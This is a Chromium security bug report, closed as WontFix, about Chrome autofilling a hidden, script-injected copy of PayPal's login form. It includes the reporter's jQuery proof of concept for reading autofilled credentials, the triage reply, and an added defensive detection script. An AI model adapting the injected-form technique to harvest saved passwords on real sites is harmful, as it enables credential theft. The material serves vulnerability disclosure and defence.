
Issue 659953


Issue metadata

Status: WontFix
Owner: ----
Closed: Oct 2016
Components:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security




Security: Autofilled passwords can be stolen via XSS attacks

Reported by m.mach...@gmail.com, Oct 27 2016

Issue description


VULNERABILITY DETAILS
1. Save an email and password on any website, like PayPal.

2. Find a way to put an XSS script in any website.

3. Put a code sample with jQuery (this works on PayPal, but we can always create clean JavaScript code; in this case you can add it in the console, F12).

3.a. Google Chrome treats it like a normal login website because it is the same host, form and path, then automatically fills it (the login section form is hidden).

3.b. Firstly we create an event that checks for the email / password fill; then in setInterval, after 100 ms, it creates a login form with the same HTML path as the normal login path.

4. The result of the bug is an alert with your filled email or password, if you want.

5. Solution -> Chrome should always ask if you want to fill your form.


VERSION
Chrome Version: 54.0.2840.71 m
Operating System: Windows 10


REPRODUCTION CASE

$(document).on('change', '#email', function () {
    // Fires once the browser autofills the injected email field; shows the filled value.
    alert(this.value);
});

// Every 100 ms, append a hidden copy of the site's own login form (same action path and
// field names) so that the password manager treats it as the real login form.
setInterval(function () {
    $('body').append('<section style="display:none" id="login" class="login" data-role="page" data-title="Zaloguj się do swojego konta PayPal"><div class="corral"><div id="content" class="contentContainer"><header><p class="paypal-logo paypal-logo-long">PayPal</p></header><h1 class="headerText accessAid">Zaloguj się do swojego konta PayPal</h1><form action="/signin" method="post" class="proceed maskable" name="login" autocomplete="off" novalidate=""><input type="hidden" id="token" name="_csrf" value="56UVcx7XQUBX+LrtWxREVn+nkIhaqPLhVPpEI="><input type="hidden" name="locale.x" value="pl_PL"><input type="hidden" name="processSignin" value="main"><div id="passwordSection" class="clearfix"><div class="textInput" id="login_emaildiv"><div class="fieldWrapper"><label for="email" class="fieldLabel">Adres e-mail</label><input id="email" name="login_email" type="email" class="hasHelp  validateEmpty  " required="required" aria-required="true" value="" autocomplete="off" placeholder="Adres e-mail"></div><div class="errorMessage" id="emailErrorMessage"><p class="emptyError hide">Wymagane</p><p class="invalidError hide">Wprowadź prawidłowy adres e-mail.</p></div></div><div class="textInput lastInputField" id="login_passworddiv"><div class="fieldWrapper"><label for="password" class="fieldLabel">Hasło</label><input id="password" name="login_password" type="password" class="hasHelp  validateEmpty  " required="required" aria-required="true" value="" placeholder="Hasło"></div><div class="errorMessage" id="passwordErrorMessage"><p class="emptyError hide">Wymagane</p></div></div></div><div class="actions actionsSpaced"><button class="button actionContinue" type="submit" id="btnLogin" name="btnLogin" value="Login">Zaloguj się</button></div><div class="forgotLink"><a href="/authflow/password-recovery/?country.x=PL&amp;locale.x=pl_PL" id="forgotPasswordModal" class="scTrack:unifiedlogin-click-forgot-password">Masz problem z zalogowaniem się?</a><div class="pwr-modal forgotPasswordModal" id="password-recovery-modal" aria-label="Password Recovery"><iframe id="pwdIframe" data-src="/authflow/password-recovery/?country.x=PL&amp;locale.x=pl_PL" scrolling="no" data-auto-reload="true" data-tabindex="0"></iframe><div class="monogram-small"></div></div></div></form><a href="/pl/webapps/mpp/account-selection" class="button secondary" id="createAccount">Utwórz konto</a></div></div><footer class="footer footerStayPut" role="contentinfo"><div class="extendedContent"><ul class="footerGroup footerGroupWithSiblings"><li><a href="/pl/webapps/mpp/ua/privacy-full">Ochrona danych</a></li><li><a href="/pl">PayPal</a></li></ul><p class="footerCopyright">Copyright © 1999-2016 PayPal. Wszelkie prawa zastrzeżone.</p></div></footer></section>');
}, 100);


Attachment: Untitled.png (993 KB)
Components: UI>Browser>Passwords
Summary: Security: Autofilled passwords can be stolen via XSS attacks (was: Security: Autofill google chrome)
The reproduction steps here appear to call for the user to perform a script-injection attack against themselves using the Developer Tools. This is explicitly outside of Chrome's threat model (see https://www.chromium.org/Home/chromium-security/security-faq#TOC-Does-entering-JavaScript:-URLs-in-the-URL-bar-or-running-script-in-the-developer-tools-mean-there-s-an-XSS-vulnerability-).

More broadly, the reader could imagine that an XSS vulnerability exists on a target website, and the malicious information-stealing script could be placed using an exploit of such a vulnerability. This is true, but not especially interesting, insofar as an XSS vulnerability on any site is inherently powerful: it can steal the user's login tokens, monitor all of their keystrokes, or (as noted here) collect credentials either manually or by watching for form autofills.

One proposal which would limit the impact of an XSS exploit is the introduction of "Write Only" form fields (https://mikewest.github.io/credentialmanagement/writeonly/), but these would not preclude any of the myriad other attacks that could be conducted against a website vulnerable to XSS.
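
The report above (steps 3.a and 3.b) and the triage reply both turn on the same shape: a form with a password field that a script appends after the page has loaded and keeps invisible, so that the password manager fills it where no user can see it. The following is an added example, not code from the report or from Chromium, of a site-side heuristic that flags forms of that shape. The descriptor fields (`action`, `hasPasswordField`, `insertedAfterLoad`, `visible`), the sample forms and the function names are constructed for this example; the browser wiring at the end is skipped when the file is run outside a browser.

```javascript
// Classify one form descriptor. A legitimate login form is present at load and
// visible; a form that carries a password field, arrived after load AND is not
// visible has no legitimate reason to receive a credential fill.
function classifyCredentialForm(form) {
  // form: { action: string, hasPasswordField: bool, insertedAfterLoad: bool, visible: bool }
  const reasons = [];
  if (!form.hasPasswordField) {
    return { suspicious: false, reasons };
  }
  if (form.insertedAfterLoad) {
    reasons.push("password field added after page load");
  }
  if (!form.visible) {
    reasons.push("form is not visible to the user");
  }
  // Require both signals; a late but visible form (e.g. a login dialog) is normal.
  return { suspicious: reasons.length === 2, reasons };
}

// Constructed sample: the site's real login form, the hidden copy the report
// describes (same action path, appended by script, display:none), and an
// unrelated late-inserted form with no password field.
const SAMPLE_FORMS = [
  { action: "/signin", hasPasswordField: true, insertedAfterLoad: false, visible: true },
  { action: "/signin", hasPasswordField: true, insertedAfterLoad: true, visible: false },
  { action: "/search", hasPasswordField: false, insertedAfterLoad: true, visible: false },
];

// Return the indices and reasons of every suspicious form in a list.
function findSuspiciousForms(forms) {
  return forms
    .map((form, index) => ({ index, ...classifyCredentialForm(form) }))
    .filter((result) => result.suspicious);
}

// Browser wiring (assumed deployment, not part of the report): observe DOM
// insertions after load, build a descriptor for each inserted <form>, and hand
// suspicious ones to `report`. Returns false when there is no DOM to observe.
function watchForInjectedCredentialForms(report) {
  if (typeof MutationObserver === "undefined" || typeof document === "undefined") {
    return false; // running under Node or another non-browser host
  }
  const observer = new MutationObserver((records) => {
    for (const record of records) {
      for (const node of record.addedNodes) {
        if (!(node instanceof Element)) continue;
        const forms = node.matches("form") ? [node] : Array.from(node.querySelectorAll("form"));
        for (const formEl of forms) {
          const result = classifyCredentialForm({
            action: formEl.getAttribute("action") || "",
            hasPasswordField: formEl.querySelector('input[type="password"]') !== null,
            insertedAfterLoad: true, // the observer is only installed after load
            // An element inside a display:none subtree has no layout boxes.
            visible: formEl.getClientRects().length > 0,
          });
          if (result.suspicious) report(formEl, result.reasons);
        }
      }
    }
  });
  observer.observe(document.documentElement, { childList: true, subtree: true });
  return true;
}

// Stand-alone run: classify the constructed sample set.
console.log(findSuspiciousForms(SAMPLE_FORMS));
```

This is detection, not prevention: once script runs in the page, the site cannot stop the browser from filling, which is the point of the triage reply. The visibility test is also deliberately narrow; it catches `display:none` (the case in the report) but not forms positioned off-screen, sized to zero or given `opacity: 0`, so a deployment would extend the descriptor with those checks rather than treat a `visible: true` result as proof of a benign form.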

Comment 2 by ta...@google.com, Oct 31 2016

Status: WontFix (was: Unconfirmed)
Thanks elawrence@, I'll change this to wontfix. I wonder if we should change this to a feature request or something similar.

Comment 3 by sheriffbot@chromium.org, Feb 7 2017

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
